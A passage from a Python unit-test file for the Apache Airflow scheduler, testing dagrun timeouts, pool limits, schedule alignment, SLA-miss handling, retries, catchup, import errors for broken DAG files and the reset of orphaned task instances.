    dag.dagrun_timeout = datetime.timedelta(seconds=60)

    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')

    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()

    scheduler = SchedulerJob()
    dag.clear()

    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    # Backdate the run's start so it is well past the 60s timeout.
    dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
    session.merge(dr)
    session.commit()

    # Creating the next run should fail the timed-out one as a side effect.
    dr2 = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr2)

    dr.refresh_from_db(session=session)
    self.assertEquals(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
    """
    Test if a dagrun will not be scheduled if max_dag_runs has been
    reached and dagrun_timeout is not reached.

    Test if a dagrun will be scheduled if max_dag_runs has been reached
    but dagrun_timeout is also reached.
    """
    dag = DAG(
        dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
        start_date=DEFAULT_DATE)
    dag.max_active_runs = 1
    dag.dagrun_timeout = datetime.timedelta(seconds=60)

    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')

    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()

    scheduler = SchedulerJob()
    dag.clear()

    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)

    # Should not be scheduled as DagRun has not timedout and max_active_runs is reached
    new_dr = scheduler.create_dag_run(dag)
    self.assertIsNone(new_dr)

    # Should be scheduled as dagrun_timeout has passed
    dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
    session.merge(dr)
    session.commit()
    new_dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
    """
    Test if _process_task_instances only schedules ti's up to max_active_runs
    (related to issue AIRFLOW-137).
    """
    dag = DAG(
        dag_id='test_scheduler_max_active_runs_respected_after_clear',
        start_date=DEFAULT_DATE)
    dag.max_active_runs = 3

    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')

    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()

    scheduler = SchedulerJob()
    dag.clear()

    # First create up to 3 dagruns in RUNNING state.
    scheduler.create_dag_run(dag)

    # Reduce max_active_runs to 1
    dag.max_active_runs = 1

    queue = Mock()
    # and schedule them in, so we can check how many
    # tasks are put on the queue (should be one, not 3)
    scheduler._process_task_instances(dag, queue=queue)

    queue.append.assert_called_with(
        (dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
    )
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
    """
    Test task instances not queued when pool is full.

    Two TIs target a pool with a single slot; both pass
    _process_task_instances (pool_full is mocked to False so they reach the
    queue), but _execute_task_instances must hand only one to the executor.
    """
    # Mock the pool out with a full pool because the pool doesn't actually
    # exist in this in-memory setup; the slot accounting is what we test.
    mock_pool_full.return_value = False

    dag = DAG(
        dag_id='test_scheduler_verify_pool_full',
        start_date=DEFAULT_DATE)

    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow',
        pool='test_scheduler_verify_pool_full')

    session = settings.Session()
    pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
    session.add(pool)
    orm_dag = DagModel(dag_id=dag.dag_id)
    orm_dag.is_paused = False
    session.merge(orm_dag)
    session.commit()

    scheduler = SchedulerJob()
    dag.clear()

    # Create 2 dagruns, which will create 2 task instances.
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    self.assertEquals(dr.execution_date, DEFAULT_DATE)
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    queue = []
    scheduler._process_task_instances(dag, queue=queue)
    self.assertEquals(len(queue), 2)
    dagbag = self._make_simple_dag_bag([dag])

    # Recreated part of the scheduler here, to kick off tasks -> executor
    for ti_key in queue:
        task = dag.get_task(ti_key[1])
        ti = TI(task, ti_key[2])
        # Task starts out in the scheduled state. All tasks in the
        # scheduled state will be sent to the executor
        ti.state = State.SCHEDULED

        # Also save this task instance to the DB.
        session.merge(ti)
        session.commit()

    scheduler._execute_task_instances(dagbag,
                                      (State.SCHEDULED,
                                       State.UP_FOR_RETRY))

    # Only one slot in the pool, so only one TI may be queued.
    self.assertEquals(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
    """
    Test if the schedule_interval will be auto aligned with the start_date
    such that if the start_date coincides with the schedule the first
    execution_date will be start_date, otherwise it will be start_date +
    interval.
    """
    # Case 1: start_date (10:10) does NOT coincide with the cron (05:04),
    # so the first execution_date is the next schedule after start_date.
    dag = DAG(
        dag_id='test_scheduler_auto_align_1',
        start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
        schedule_interval="4 5 * * *"
    )
    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')

    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()

    scheduler = SchedulerJob()
    dag.clear()

    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))

    # Case 2: start_date (10:10) coincides exactly with the cron (10:10),
    # so the first execution_date equals the start_date itself.
    dag = DAG(
        dag_id='test_scheduler_auto_align_2',
        start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
        schedule_interval="10 10 * * *"
    )
    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')

    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()

    scheduler = SchedulerJob()
    dag.clear()

    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
    """
    Checks if tasks that are not taken up by the executor
    get rescheduled.
    """
    executor = TestExecutor()

    dagbag = DagBag(executor=executor)
    dagbag.dags.clear()
    dagbag.executor = executor

    dag = DAG(
        dag_id='test_scheduler_reschedule',
        start_date=DEFAULT_DATE)
    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')

    dag.clear()
    dag.is_subdag = False

    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    orm_dag.is_paused = False
    session.merge(orm_dag)
    session.commit()

    dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)

    # Patch DagBag so the scheduler sees exactly the bag built above.
    @mock.patch('airflow.models.DagBag', return_value=dagbag)
    @mock.patch('airflow.models.DagBag.collect_dags')
    def do_schedule(function, function2):
        # Use a empty file since the above mock will return the
        # expected DAGs. Also specify only a single file so that it doesn't
        # try to schedule the above DAG repeatedly.
        scheduler = SchedulerJob(num_runs=1,
                                 executor=executor,
                                 subdir=os.path.join(settings.DAGS_FOLDER,
                                                     "no_dags.py"))
        scheduler.heartrate = 0
        scheduler.run()

    do_schedule()
    self.assertEquals(1, len(executor.queued_tasks))

    # The TestExecutor never ran the task; clearing its queue simulates the
    # executor dropping it, so the next pass must re-queue it.
    executor.queued_tasks.clear()

    do_schedule()
    self.assertEquals(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
    """
    Test that the scheduler does not call the sla_miss_callback when a
    notification has already been sent.
    """
    session = settings.Session()

    # Mock the callback function so we can verify that it was not called
    sla_callback = MagicMock()

    # Create dag with a start of 2 days ago, but an sla of 1 day ago so we'll already have an sla_miss on the books
    test_start_date = days_ago(2)
    dag = DAG(dag_id='test_sla_miss',
              sla_miss_callback=sla_callback,
              default_args={'start_date': test_start_date,
                            'sla': datetime.timedelta(days=1)})

    task = DummyOperator(task_id='dummy',
                         dag=dag,
                         owner='airflow')

    # Create a TaskInstance for two days ago
    session.merge(models.TaskInstance(task=task,
                                      execution_date=test_start_date,
                                      state='success'))

    # Create an SlaMiss where notification was sent, but email was not
    session.merge(models.SlaMiss(task_id='dummy',
                                 dag_id='test_sla_miss',
                                 execution_date=test_start_date,
                                 email_sent=False,
                                 notification_sent=True))

    # Now call manage_slas and see if the sla_miss callback gets called
    scheduler = SchedulerJob(dag_id='test_sla_miss',
                             num_runs=1)
    scheduler.manage_slas(dag=dag, session=session)

    # notification_sent=True above means the callback must be skipped.
    sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
    """
    Test that the scheduler gracefully logs an exception if there is a problem
    calling the sla_miss_callback.
    """
    session = settings.Session()

    sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))

    test_start_date = days_ago(2)
    dag = DAG(dag_id='test_sla_miss',
              sla_miss_callback=sla_callback,
              default_args={'start_date': test_start_date})

    task = DummyOperator(task_id='dummy',
                         dag=dag,
                         owner='airflow',
                         sla=datetime.timedelta(hours=1))

    # NOTE(review): state is 'Success' (capitalized) here, while the sibling
    # test above uses 'success' — confirm whether the capitalization is
    # intentional (i.e. the TI deliberately does not count as succeeded).
    session.merge(models.TaskInstance(task=task,
                                      execution_date=test_start_date,
                                      state='Success'))

    # Create an SlaMiss where notification was sent, but email was not
    session.merge(models.SlaMiss(task_id='dummy',
                                 dag_id='test_sla_miss',
                                 execution_date=test_start_date))

    # Now call manage_slas and see if the sla_miss callback gets called
    scheduler = SchedulerJob(dag_id='test_sla_miss')
    with mock.patch('airflow.jobs.SchedulerJob.log',
                    new_callable=PropertyMock) as mock_log:
        scheduler.manage_slas(dag=dag, session=session)
        # The callback raised; manage_slas must log and carry on.
        sla_callback.assert_called()
        mock_log().exception.assert_called_with(
            'Could not call sla_miss_callback for DAG %s',
            'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
    """
    Test that the scheduler gracefully logs an exception if there is a problem
    sending an email.
    """
    session = settings.Session()

    # Mock the callback function so we can verify that it was not called
    mock_send_email.side_effect = RuntimeError('Could not send an email')

    test_start_date = days_ago(2)
    dag = DAG(dag_id='test_sla_miss',
              default_args={'start_date': test_start_date,
                            'sla': datetime.timedelta(days=1)})

    task = DummyOperator(task_id='dummy',
                         dag=dag,
                         owner='airflow',
                         email='test@test.com',
                         sla=datetime.timedelta(hours=1))

    # NOTE(review): state is 'Success' (capitalized) here, unlike the
    # lowercase 'success' used elsewhere — confirm this is intentional.
    session.merge(models.TaskInstance(task=task,
                                      execution_date=test_start_date,
                                      state='Success'))

    # Create an SlaMiss where notification was sent, but email was not
    session.merge(models.SlaMiss(task_id='dummy',
                                 dag_id='test_sla_miss',
                                 execution_date=test_start_date))

    scheduler = SchedulerJob(dag_id='test_sla_miss',
                             num_runs=1)
    with mock.patch('airflow.jobs.SchedulerJob.log',
                    new_callable=PropertyMock) as mock_log:
        scheduler.manage_slas(dag=dag, session=session)
        # send_email raised; manage_slas must log the failure and continue.
        mock_log().exception.assert_called_with(
            'Could not send SLA Miss email notification for DAG %s',
            'test_sla_miss')
def test_retry_still_in_executor(self):
    """
    Checks if the scheduler does not put a task in limbo, when a task is retried
    but is still present in the executor.
    """
    executor = TestExecutor()
    dagbag = DagBag(executor=executor)
    dagbag.dags.clear()
    dagbag.executor = executor

    dag = DAG(
        dag_id='test_retry_still_in_executor',
        start_date=DEFAULT_DATE,
        schedule_interval="@once")
    dag_task1 = BashOperator(
        task_id='test_retry_handling_op',
        bash_command='exit 1',
        retries=1,
        dag=dag,
        owner='airflow')

    dag.clear()
    dag.is_subdag = False

    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    orm_dag.is_paused = False
    session.merge(orm_dag)
    session.commit()

    dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)

    # Patch DagBag so the scheduler sees exactly the bag built above.
    @mock.patch('airflow.models.DagBag', return_value=dagbag)
    @mock.patch('airflow.models.DagBag.collect_dags')
    def do_schedule(function, function2):
        # Use a empty file since the above mock will return the
        # expected DAGs. Also specify only a single file so that it doesn't
        # try to schedule the above DAG repeatedly.
        scheduler = SchedulerJob(num_runs=1,
                                 executor=executor,
                                 subdir=os.path.join(settings.DAGS_FOLDER,
                                                     "no_dags.py"))
        scheduler.heartrate = 0
        scheduler.run()

    do_schedule()
    self.assertEquals(1, len(executor.queued_tasks))

    def run_with_error(task):
        # Run the TI, swallowing the expected failure of `exit 1`.
        try:
            task.run()
        except (AirflowException, XToolException):
            pass

    ti_tuple = six.next(six.itervalues(executor.queued_tasks))
    (command, priority, queue, ti) = ti_tuple
    ti.task = dag_task1

    self.assertEqual(ti.try_number, 1)
    # fail execution
    run_with_error(ti)
    self.assertEqual(ti.state, State.UP_FOR_RETRY)
    self.assertEqual(ti.try_number, 2)

    ti.refresh_from_db(lock_for_update=True, session=session)
    ti.state = State.SCHEDULED
    session.merge(ti)
    session.commit()

    # do not schedule: the task is still sitting in the executor's queue,
    # so the scheduler must not create a duplicate
    do_schedule()
    self.assertTrue(executor.has_task(ti))
    ti.refresh_from_db()
    # removing self.assertEqual(ti.state, State.SCHEDULED)
    # as scheduler will move state from SCHEDULED to QUEUED

    # now the executor has cleared and it should be allowed the re-queue
    executor.queued_tasks.clear()
    do_schedule()
    ti.refresh_from_db()
    self.assertEqual(ti.state, State.QUEUED)

    # calling below again in order to ensure with try_number 2,
    # scheduler doesn't put task in queue
    do_schedule()
    self.assertEquals(1, len(executor.queued_tasks))
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
    """
    Integration test of the scheduler not accidentally resetting
    the try_numbers for a task.
    """
    dag = self.dagbag.get_dag('test_retry_handling_job')
    dag_task1 = dag.get_task("test_retry_handling_op")
    dag.clear()

    scheduler = SchedulerJob(dag_id=dag.dag_id,
                             num_runs=1)
    scheduler.heartrate = 0
    scheduler.run()

    session = settings.Session()
    ti = session.query(TI).filter(TI.dag_id==dag.dag_id,
                                  TI.task_id==dag_task1.task_id).first()

    # make sure the counter has increased
    self.assertEqual(ti.try_number, 2)
    self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_scheduler_run_duration(self):
    """
    Verifies that the scheduler run duration limit is followed.
    """
    dag_id = 'test_start_date_scheduling'
    dag = self.dagbag.get_dag(dag_id)
    dag.clear()
    self.assertTrue(dag.start_date > DEFAULT_DATE)

    expected_run_duration = 5
    start_time = timezone.utcnow()
    scheduler = SchedulerJob(dag_id,
                             run_duration=expected_run_duration)
    scheduler.run()
    end_time = timezone.utcnow()

    run_duration = (end_time - start_time).total_seconds()
    logging.info("Test ran in %.2fs, expected %.2fs",
                 run_duration,
                 expected_run_duration)
    # Allow up to 5s of slack over the configured run_duration.
    self.assertLess(run_duration - expected_run_duration, 5.0)
def test_dag_with_system_exit(self):
    """
    Test to check that a DAG with a system.exit() doesn't break the scheduler.
    """
    dag_id = 'exit_test_dag'
    dag_ids = [dag_id]
    # The fixture folder contains DAG files that call sys.exit() at parse time.
    dag_directory = os.path.join(settings.DAGS_FOLDER,
                                 "..",
                                 "dags_with_system_exit")
    dag_file = os.path.join(dag_directory,
                            'b_test_scheduler_dags.py')

    dagbag = DagBag(dag_folder=dag_file)
    for dag_id in dag_ids:
        dag = dagbag.get_dag(dag_id)
        dag.clear()

    scheduler = SchedulerJob(dag_ids=dag_ids,
                             subdir=dag_directory,
                             num_runs=1)
    scheduler.run()
    session = settings.Session()
    # The well-behaved DAG in the same folder must still have been scheduled.
    self.assertEqual(
        len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
    """
    Test to check that a DAG returns its active runs.

    Creates a three-task linear DAG, asks the scheduler for a dagrun and
    verifies the run's execution_date appears in dag.get_active_runs().
    """
    now = timezone.utcnow()
    six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)

    START_DATE = six_hours_ago_to_the_hour
    DAG_NAME1 = 'get_active_runs_test'

    default_args = {
        'owner': 'airflow',
        'depends_on_past': False,
        'start_date': START_DATE
    }
    dag1 = DAG(DAG_NAME1,
               schedule_interval='* * * * *',
               max_active_runs=1,
               default_args=default_args
               )

    run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
    run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
    run_this_2.set_upstream(run_this_1)
    run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
    run_this_3.set_upstream(run_this_2)

    session = settings.Session()
    orm_dag = DagModel(dag_id=dag1.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()

    scheduler = SchedulerJob()
    dag1.clear()

    dr = scheduler.create_dag_run(dag1)

    # We had better get a dag run
    self.assertIsNotNone(dr)

    execution_date = dr.execution_date

    running_dates = dag1.get_active_runs()

    try:
        running_date = running_dates[0]
    except IndexError:
        # Narrowed from a bare `except:` — only an empty result list is the
        # expected failure mode here; anything else should surface.
        running_date = 'Except'

    self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
    """
    Test to check that a DAG with catchup = False only schedules beginning now,
    not back to the start date.
    """
    def setup_dag(dag_id, schedule_interval, start_date, catchup):
        # Build a three-task linear DAG and register its DagModel row.
        default_args = {
            'owner': 'airflow',
            'depends_on_past': False,
            'start_date': start_date
        }
        dag = DAG(dag_id,
                  schedule_interval=schedule_interval,
                  max_active_runs=1,
                  catchup=catchup,
                  default_args=default_args)

        t1 = DummyOperator(task_id='t1', dag=dag)
        t2 = DummyOperator(task_id='t2', dag=dag)
        t2.set_upstream(t1)
        t3 = DummyOperator(task_id='t3', dag=dag)
        t3.set_upstream(t2)

        session = settings.Session()
        orm_dag = DagModel(dag_id=dag.dag_id)
        session.merge(orm_dag)
        session.commit()
        session.close()

        return dag

    now = timezone.utcnow()
    six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
        minute=0, second=0, microsecond=0)
    half_an_hour_ago = now - datetime.timedelta(minutes=30)
    two_hours_ago = now - datetime.timedelta(hours=2)

    scheduler = SchedulerJob()

    dag1 = setup_dag(dag_id='dag_with_catchup',
                     schedule_interval='* * * * *',
                     start_date=six_hours_ago_to_the_hour,
                     catchup=True)
    # Sanity: catchup defaults to True both in config and on the DAG.
    default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
    self.assertEqual(default_catchup, True)
    self.assertEqual(dag1.catchup, True)

    dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
                     schedule_interval='*/10 * * * *',
                     start_date=six_hours_ago_to_the_hour,
                     catchup=False)
    dr = scheduler.create_dag_run(dag2)
    # We had better get a dag run
    self.assertIsNotNone(dr)
    # The DR should be scheduled in the last half an hour, not 6 hours ago
    self.assertGreater(dr.execution_date, half_an_hour_ago)
    # The DR should be scheduled BEFORE now
    self.assertLess(dr.execution_date, timezone.utcnow())

    dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
                     schedule_interval='@hourly',
                     start_date=six_hours_ago_to_the_hour,
                     catchup=False)
    dr = scheduler.create_dag_run(dag3)
    # We had better get a dag run
    self.assertIsNotNone(dr)
    # The DR should be scheduled in the last 2 hours, not 6 hours ago
    self.assertGreater(dr.execution_date, two_hours_ago)
    # The DR should be scheduled BEFORE now
    self.assertLess(dr.execution_date, timezone.utcnow())

    dag4 = setup_dag(dag_id='dag_without_catchup_once',
                     schedule_interval='@once',
                     start_date=six_hours_ago_to_the_hour,
                     catchup=False)
    dr = scheduler.create_dag_run(dag4)
    self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
    """An unparseable DAG file present before the scheduler starts must
    produce exactly one ImportError row with the parse failure recorded."""
    try:
        dags_folder = mkdtemp()
        unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
        with open(unparseable_filename, 'w') as unparseable_file:
            unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)

    session = settings.Session()
    import_errors = session.query(models.ImportError).all()

    self.assertEqual(len(import_errors), 1)
    import_error = import_errors[0]
    self.assertEqual(import_error.filename,
                     unparseable_filename)
    self.assertEqual(import_error.stacktrace,
                     "invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
    """An unparseable DAG file dropped in after a first scheduler loop must
    be picked up on the next loop and recorded as one ImportError row."""
    try:
        dags_folder = mkdtemp()
        unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
        # First loop runs against an empty folder ...
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
        # ... then the broken file appears and a second loop parses it.
        with open(unparseable_filename, 'w') as unparseable_file:
            unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)

    session = settings.Session()
    import_errors = session.query(models.ImportError).all()

    self.assertEqual(len(import_errors), 1)
    import_error = import_errors[0]
    self.assertEqual(import_error.filename,
                     unparseable_filename)
    self.assertEqual(import_error.stacktrace,
                     "invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
    """A syntactically valid DAG file must not create any ImportError rows."""
    try:
        dags_folder = mkdtemp()
        parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)

        with open(parseable_filename, 'w') as parseable_file:
            parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)

    session = settings.Session()
    import_errors = session.query(models.ImportError).all()

    self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
    """Rewriting a broken DAG file must replace its ImportError row rather
    than accumulate a second one (the line number in the trace updates)."""
    try:
        dags_folder = mkdtemp()
        unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)

        # Generate original import error
        with open(unparseable_filename, 'w') as unparseable_file:
            unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)

        # Generate replacement import error (the error will be on the second line now)
        with open(unparseable_filename, 'w') as unparseable_file:
            unparseable_file.writelines(
                PARSEABLE_DAG_FILE_CONTENTS +
                os.linesep +
                UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)

    session = settings.Session()
    import_errors = session.query(models.ImportError).all()

    # Still exactly one row, now pointing at line 2.
    self.assertEqual(len(import_errors), 1)
    import_error = import_errors[0]
    self.assertEqual(import_error.filename,
                     unparseable_filename)
    self.assertEqual(import_error.stacktrace,
                     "invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
    """Fixing the syntax error in a DAG file must clear its ImportError row
    on the next scheduler loop."""
    try:
        dags_folder = mkdtemp()
        filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)

        # Generate original import error
        with open(filename_to_parse, 'w') as file_to_parse:
            file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)

        # Remove the import error from the file
        with open(filename_to_parse, 'w') as file_to_parse:
            file_to_parse.writelines(
                PARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)

    session = settings.Session()
    import_errors = session.query(models.ImportError).all()

    self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
    """Deleting a broken DAG file must clear its ImportError row on the next
    scheduler loop."""
    try:
        dags_folder = mkdtemp()
        filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)

        # Generate original import error
        with open(filename_to_parse, 'w') as file_to_parse:
            file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)

    # Rerun the scheduler once the dag file has been removed
    self.run_single_scheduler_loop_with_no_dags(dags_folder)

    session = settings.Session()
    import_errors = session.query(models.ImportError).all()

    self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
    """
    [JIRA-1357] Test the 'list_py_file_paths' function used by the
    scheduler to list and load DAGs.
    """
    detected_files = []
    expected_files = []
    # Every .py/.zip in the test DAGs folder should be listed, except the
    # deliberately-empty no_dags.py fixture.
    for file_name in os.listdir(TEST_DAGS_FOLDER):
        if file_name.endswith('.py') or file_name.endswith('.zip'):
            if file_name not in ['no_dags.py']:
                expected_files.append(
                    '{}/{}'.format(TEST_DAGS_FOLDER, file_name))
    for file_path in list_py_file_paths(TEST_DAGS_FOLDER):
        detected_files.append(file_path)
    self.assertEqual(sorted(detected_files), sorted(expected_files))
def test_reset_orphaned_tasks_nothing(self):
    """With an empty database, reset_state_for_orphaned_tasks resets nothing."""
    scheduler = SchedulerJob()
    session = settings.Session()
    reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
    self.assertEqual(0, len(reset_tis))
def test_reset_orphaned_tasks_external_triggered_dag(self):
    """An orphaned (SCHEDULED) task in a running, externally-triggered
    dagrun is still reset."""
    dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()

    dr1 = scheduler.create_dag_run(dag, session=session)
    ti = dr1.get_task_instances(session=session)[0]
    dr1.state = State.RUNNING
    ti.state = State.SCHEDULED
    dr1.external_trigger = True
    session.merge(ti)
    session.merge(dr1)
    session.commit()

    reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
    self.assertEquals(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
    """Tasks belonging to a backfill dagrun (run_id with the backfill
    prefix) must NOT be reset — backfills manage their own state."""
    dag_id = 'test_reset_orphaned_tasks_backfill_dag'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()

    dr1 = scheduler.create_dag_run(dag, session=session)
    ti = dr1.get_task_instances(session=session)[0]
    ti.state = State.SCHEDULED
    dr1.state = State.RUNNING
    # Any run_id starting with the backfill prefix marks the run as a backfill.
    dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
    session.merge(ti)
    session.merge(dr1)
    session.commit()

    self.assertTrue(dr1.is_backfill)
    self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
    """Try to reset when we specify a dagrun and ensure nothing else is."""
    dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()
    # make two dagruns, only reset for one
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr1.state = State.SUCCESS
    dr2.state = State.RUNNING
    ti1 = dr1.get_task_instances(session=session)[0]
    ti2 = dr2.get_task_instances(session=session)[0]
    ti1.state = State.SCHEDULED
    ti2.state = State.SCHEDULED

    session.merge(ti1)
    session.merge(ti2)
    session.merge(dr1)
    session.merge(dr2)
    session.commit()

    # Only dr2 is passed in, so only ti2 may be reset (to NONE).
    reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
    self.assertEquals(1, len(reset_tis))
    ti1.refresh_from_db(session=session)
    ti2.refresh_from_db(session=session)
    self.assertEquals(State.SCHEDULED, ti1.state)
    self.assertEquals(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
    """Make sure a task in an orphaned state is not reset if it has no dagrun. """
    dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    task = DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()

    # Insert the TI directly — deliberately no dagrun is created for it.
    ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
    session.add(ti)
    session.commit()

    ti.refresh_from_db()
    ti.state = State.SCHEDULED
    session.merge(ti)
    session.commit()

    self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
    """A RUNNING task in a RUNNING dagrun is not orphaned and must be
    left untouched."""
    dag_id = 'test_reset_orphaned_tasks_no_orphans'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()

    dr1 = scheduler.create_dag_run(dag)
    dr1.state = State.RUNNING
    tis = dr1.get_task_instances(session=session)
    tis[0].state = State.RUNNING
    session.merge(dr1)
    session.merge(tis[0])
    session.commit()

    self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
    tis[0].refresh_from_db()
    self.assertEquals(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
    """Ensure orphaned tasks with non-running dagruns are not reset."""
